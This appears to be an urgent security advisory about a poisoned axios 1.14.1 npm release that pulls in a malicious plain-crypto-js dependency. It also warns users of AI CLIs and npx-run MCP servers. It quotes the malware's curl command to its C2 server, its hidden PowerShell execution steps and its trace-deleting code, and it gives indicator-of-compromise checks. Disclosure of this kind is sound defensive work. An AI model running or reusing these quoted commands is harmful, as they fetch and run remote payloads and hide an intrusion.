⚠️⚠️⚠️ Urgent Notice ⚠️⚠️⚠️
Dear developers, especially those using the axios library in Node.js, please check your axios version.
Additionally, this applies not only to developers but also to those using AI CLIs (such as Codex, Claude Code) and calling MCPs like Open Web Search.
When using the latest version installed via npx, axios@1.14.1 will be installed. This version is susceptible to supply chain poisoning.
Malicious Package │ plain-crypto-js@4.2.1 (disguised as crypto-js)
Poisoned axios │ axios@1.14.1 (modified, with plain-crypto-js dependency added)
Affected MCPs │ Open Web Search and exa-mcp-server's npx cache
Malicious Behavior │ Copies PowerShell as wt.exe, executes a remote payload, and then self-deletes.
Detailed Attack Behavior Explanation
C2 Server: http:/sfrclak.com:8000/6202033
Attacking with full coverage across three platforms
Windows:
1. Locate the path powershell.exe in PowerShell.
2. Copy powershell.exe to C:\ProgramData\wt.exe (disguised as Windows Terminal).
3. Write a VBScript to %TEMP%\6202033.vbs:
- Download the payload from C2 using curl: curl -s -X POST -d "packages.npm.org/product1" "http:/sfrclak.com:8000/6202033"
- Save as a .ps1 file
- Use the disguised... wt.exe (Actually PowerShell) Execute in hidden window: -w hidden -ep bypass
- Delete .ps1 after execution
4. Silently execute VBS using cscript, then delete VBS after execution
macOS:
1. Use curl to download binary from C2 to /Library/Caches/com.apple.act.mond (disguised as a system process)
2. Grant permissions with chmod 770
3. Execute in the background, then connect back to C2
4. Execute via osascript (AppleScript), then delete traces
Linux:
1. Use curl to download Python script from C2 to /tmp/ld.py
2. Execute in the background with nohup, then connect back to C2
Final destruction of traces
// Delete setup.js itself
fs.unlink(__filename, (x=>{}));
// Rename package.md to package.json, overwriting the original package.json containing postinstall
fs.rename("package.md", "package.json", (x=>{}));
Even package.json was replaced, and a post-install dependency check will not show that postinstall ever existed.
Quick troubleshooting: npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"
Please check the following in plain-crypto-js:
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"
If the program setup.js has been run, package.json the contents of this directory will be replaced with clean stub files.
The existence of this directory is sufficient proof that the dispenser has been executed.
Check for RAT traces on the affected system:
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED":: Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
This is a zero-day supply chain attack that occurred less than 24 hours ago (March 31, 2026), and has not yet been publicly disclosed by npm and the security community.
